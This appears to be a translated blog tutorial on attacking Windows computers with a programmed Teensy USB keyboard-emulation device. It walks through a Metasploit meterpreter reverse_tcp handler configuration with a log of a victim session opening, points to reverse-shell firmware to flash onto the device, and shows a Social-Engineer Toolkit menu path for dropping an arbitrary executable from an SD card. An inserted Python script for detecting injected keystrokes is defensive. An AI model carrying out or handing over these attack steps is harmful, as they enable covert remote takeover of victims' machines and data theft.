
Attacking Computers Using Teensy HID - Part 1

visudo.info/tan-cong-may-tinh-su-dung-teensy-hid-p1/

10/7/2016
Attacks on computers using HID devices have been around for many years. HID is a device class of the USB standard and is used in a wide range of peripherals of different shapes, sizes and functions. In this article, I run a series of lab experiments using a Teensy HID device, hardware version 3.2, to exploit and take control of a computer, along with several other forms of attack.

HID (Human Interface Device): a device class in the USB standard. An HID device can be programmed to redefine its function. An HID device can be a USB keyboard, a USB mouse, a handheld game controller, a data storage device, ...

Social Engineering Attacks


The search for security weaknesses and their use for exploitation and data theft never stops. Every new solution or technology trend brings risks that attackers can turn against careless users. Malicious hardware is no exception: it is becoming more sophisticated, and the range of attacks possible from hardware devices keeps growing.
Practice has shown this to be true. Below I summarize a number of attack scenarios, from the classic ones to the newest methods, in which the victims are end users or IT systems with weak security policies.

USB Storage Devices Carrying Malware


USB storage devices have become a widely used standard in the digital age. Manufacturers of USB storage devices must follow the "USB mass-storage device class" specification so that the device reports its hardware information to the operating system, which lets the two identify each other and connect quickly through a driver. Many widely used device types fall under this class, including USB flash drives, memory cards, card readers, digital cameras, MP3/MP4 players, digital photo frames and smartphones. The main attack method against these devices is that they can carry malware that relies on a careless user to activate it. This was considered a common and easy attack at the time USB was first becoming popular.
Since Windows 95, the Autorun feature (using autorun.inf) has been one of the notable points that let attackers deploy malware easily, without manual activation. In later versions of the operating system, Microsoft kept improving its features to keep users safe from peripheral devices:
Windows XP blocks execution of autorun.inf from USB, but still allows CD/DVD to trigger autorun.inf. This is when the USB U3 device appeared: essentially an ordinary USB device with a built-in function that creates an extra partition presented as a CD/DVD device, in order to get past the operating system's control mechanism.
Vista blocks autorun.inf on all peripheral devices and introduces the UAC (User Account Control) protection mechanism. UAC is still used in Windows 7, Windows 8 and Windows 10 to strengthen control over the automatic execution of malware.
HID-based attacks today can bypass most of the operating system's default security controls.


USB U3 Storage Devices
USB U3: essentially an ordinary USB device with a built-in function that creates an extra partition presented as a CD/DVD device.

The USB U3 device emerged as an offshoot of techniques for getting around the USB controls of Windows XP. USB U3 takes advantage of the Autorun policy being allowed only on CD/DVD; attackers used this feature to store malware and run it automatically on XP.

HID Devices - A Polymorphic Attack Technique


To get past the control mechanisms of today's operating systems, an attack using an HID device is a perfect choice. By reprogramming the microcontroller of an HID device, an attacker can emulate the behaviour of a keyboard or mouse and send the desired data to the connected computer or device, in order to execute malicious code and take control.
Because it is flexible and its microcontroller can be redefined, an HID device can hide behind many different shapes and functions, such as a power charger, a keyboard, a USB fan, a USB lamp, a memory card reader, a clock, ...
The market today offers many microcontrollers, integrated boards and devices that support HID, and users can quickly change their firmware through a programming language. Typical examples include Arduino, Raspberry Pi, Teensy, USB Rubber Ducky Deluxe, ...
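
A defensive counterpart to the keyboard emulation described above, as an added example that is not part of the original article: an emulated keyboard usually types far faster and more evenly than a person, so a host agent can flag bursts of keystrokes by their inter-key timing. The thresholds, function names and sample timestamps are assumptions constructed for illustration.

```python
from itertools import accumulate
from statistics import mean, pstdev

# Thresholds are illustrative assumptions, not measured values; tune per site.
MIN_BURST = 12          # keystrokes needed before a burst is judged
MAX_MEAN_GAP_MS = 25    # sustained typing faster than this is not human
MAX_JITTER_MS = 5       # human gaps vary; firmware delays are near-constant
IDLE_GAP_MS = 500       # a pause this long ends the current burst

def split_bursts(timestamps_ms):
    """Group key-down timestamps (ms, ascending) into bursts split by idle pauses."""
    bursts, current = [], []
    for t in timestamps_ms:
        if current and t - current[-1] > IDLE_GAP_MS:
            bursts.append(current)
            current = []
        current.append(t)
    if current:
        bursts.append(current)
    return bursts

def classify(burst):
    """Return the reasons a burst looks machine-typed; an empty list means human."""
    if len(burst) < MIN_BURST:
        return []  # too short to judge without false positives
    gaps = [b - a for a, b in zip(burst, burst[1:])]
    reasons = []
    if mean(gaps) <= MAX_MEAN_GAP_MS:
        reasons.append("too fast")
    if pstdev(gaps) <= MAX_JITTER_MS:
        reasons.append("too regular")
    return reasons

def scan(timestamps_ms):
    """Return (start_ms, key_count, reasons) for every suspicious burst."""
    findings = []
    for burst in split_bursts(timestamps_ms):
        reasons = classify(burst)
        if reasons:
            findings.append((burst[0], len(burst), reasons))
    return findings

# Constructed sample data: a person typing, then two emulated-keyboard bursts.
HUMAN = list(accumulate([0, 180, 95, 240, 130, 310, 85, 150, 205, 120, 175, 260, 140, 90]))
INJECTED = [5000 + 4 * i for i in range(40)]    # 4 ms between keys
PACED = [20000 + 120 * i for i in range(20)]    # fixed 120 ms firmware delay

if __name__ == "__main__":
    for start, count, reasons in scan(HUMAN + INJECTED + PACED):
        print(f"burst at {start} ms: {count} keys, {', '.join(reasons)}")
```

Feed it distinct key presses only: auto-repeat from a held key is also fast and regular and should be filtered out before scanning.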

Figure 1: Devices that support HID

The Teensy HID Device


Teensy is a USB-based microcontroller board, designed to be small and extensible with many different features. Compiling, flashing the chip and running code are all done over the USB connection. A Teensy 3.2 board costs about 20 USD and can be bought online at the PJRC Store.

Figure 2: The Teensy 3.2 device

Arduino IDE, Teensyduino


To upload source code to the device, you need to install the Arduino IDE and the Teensyduino library:
Download Arduino IDE: https://www.arduino.cc/en/Main/Software
Download Teensyduino: https://www.pjrc.com/teensy/td_download.html

Figure 3: The Arduino IDE and Teensyduino interface


Once installation has succeeded, you can write programs and upload them to the device through the Arduino IDE. Take care to select the hardware version you are actually using before uploading.

Figure 4: Setting up the Teensy 3.2 programming environment

Teensy USB: Cross-Platform Attacks


Teensy can act as a malicious device on its own (storing the dropper code in the Teensy itself), or it can be combined with an SD card to extend its data storage (holding CVE exploits, 0-days, malware, ...). Once the dropper has been created on the victim machine, it fetches exploit code, backdoors, ... from the attacker's server.

Attack 1: Teensy USB + Metasploit


This is the simplest attack technique, taking control of the victim machine in under 30 seconds.
Step 1: Start Metasploit on the attacker's server
Create the file payload_handler.rc with the following content:
root@kali:~# cat payload_handler.rc
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 4444
set ExitOnSession false
set EnableStageEncoding true
exploit -j
Start the attacker's server with the msfconsole command:
root@kali:~# msfconsole -r payload_handler.rc
....
[*] Processing payload_handler.rc for ERB directives.
resource (payload_handler.rc)> use multi/handler
resource (payload_handler.rc)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (payload_handler.rc)> set LHOST 0.0.0.0
LHOST => 0.0.0.0
resource (payload_handler.rc)> set LPORT 4444
LPORT => 4444
resource (payload_handler.rc)> set ExitOnSession false
ExitOnSession => false
resource (payload_handler.rc)> set EnableStageEncoding true
EnableStageEncoding => true
resource (payload_handler.rc)> exploit -j
[*] Exploit running as background job.
Step 2: Program the Teensy
Several platforms provide program code for creating a connection from the victim machine to the attacker's server, such as the Social Engineering Toolkit, hid-backdoor-peensy, ... In this example, I use the Teensyterpreter code, which has only the most basic features, so that the capabilities of the Teensy can be understood quickly.
Download the Teensyterpreter source code at:
https://raw.githubusercontent.com/KernelEquinox/Teensyterpreter/master/Teensyterpreter.ino
Open the file Teensyterpreter.ino in the Arduino IDE and adjust the connection settings to the IP and port of the Metasploit server.

Figure 5: Setting the IP address and port for the connection to the attacker's server

Before compiling and flashing the chip, take care to set the Teensy device type to "Keyboard + Mouse + Joystick".

Figure 6: Setting the USB device type


Compile and flash the chip using the Verify and Upload buttons.

Figure 7: Compiling Teensyterpreter

After uploading the program, you can check the connection in Metasploit.


[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Starting the payload handler...
msf exploit(handler) > [*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (958029 bytes) to 14.187.167.126
[*] Meterpreter session 1 opened (192.168.207.141:4444 -> 14.187.167.126:11167) at 2016-07-10 01:34:04 -0400
msf exploit(handler) > sessions -i
Active sessions
===============
  Id  Type                   Information             Connection
  --  ----                   -----------             ----------
  1   meterpreter x86/win32  VICTIM\victim @ VICTIM  192.168.207.141:4444 -> 14.187.167.126:11167 (192.168.1.64)

msf exploit(handler) >

Figure 8: Connection from the victim machine to Metasploit

Attack 2: Teensy USB + Micro SD card


To overcome the limitations of attacking a computer in an environment with no internet connection, or when data needs to be copied from a victim's computer, I store the malicious code on a MicroSD card and reprogram the Teensy.
To attach a MicroSD device to the Teensy, I need an additional "SD Adaptor" module. You can buy this board at http://www.pjrc.com/store/sd_adaptor.html; the module is compatible with the Teensy USB and is small, which suits disguising the device.

Figure 9: SD Adaptor board


However, you can also buy other kinds of adaptor on the market; read the instructions carefully so that you can connect the hardware and program the matching pins.

Figure 10: SD Adaptor board for Arduino

Figure 11: Connecting the Teensy USB and the SD adaptor

Hardware connection
To connect the hardware, I use several 10 cm female-to-female jumper wires and solder header pins onto the Teensy board. The wiring is as follows:
SD Adaptor ----------- Teensy
+5V (VCC)      ->  3.3V (100 mA max)
Ground (GND)   ->  GND
MOSI           ->  pin 11, DOUT
MISO           ->  pin 12, DIN
SCLK (SCK)     ->  pin 13, SCK
SS (CS)        ->  pin 10, CS

Uploading the card-reading program
I upload a program to test the connection to the memory card and check the data on the COM port.

Figure 12: SD CardInfo source code


Set chipSelect = 10 to match the CS/SS pin used in the physical wiring.
// change this to match your SD shield or module;
// Arduino Ethernet shield: pin 4
// Adafruit SD shields and modules: pin 10
// Sparkfun SD shield: pin 8
const int chipSelect = 10;

Figure 13: SD CardInfo source code

Figure 14: SD CardInfo source code

Deploying the malware
I use the Social-Engineer Toolkit (SET) on Kali to create the malware and program the Teensy.

Figure 15: Attack flow using Teensy + SD Card


root@kali:~# setoolkit
1) Social-Engineering Attacks
6) Arduino-Based Attack Vector
8) SDCard 2 Teensy Attack (Deploy Any EXE)
Load the prepared payload.exe so that it is converted to a .txt file at the path /usr/share/set/. Copy converts.txt to the memory card and upload teensy.pde to the Teensy.

Copyright Visudo Blog 2016
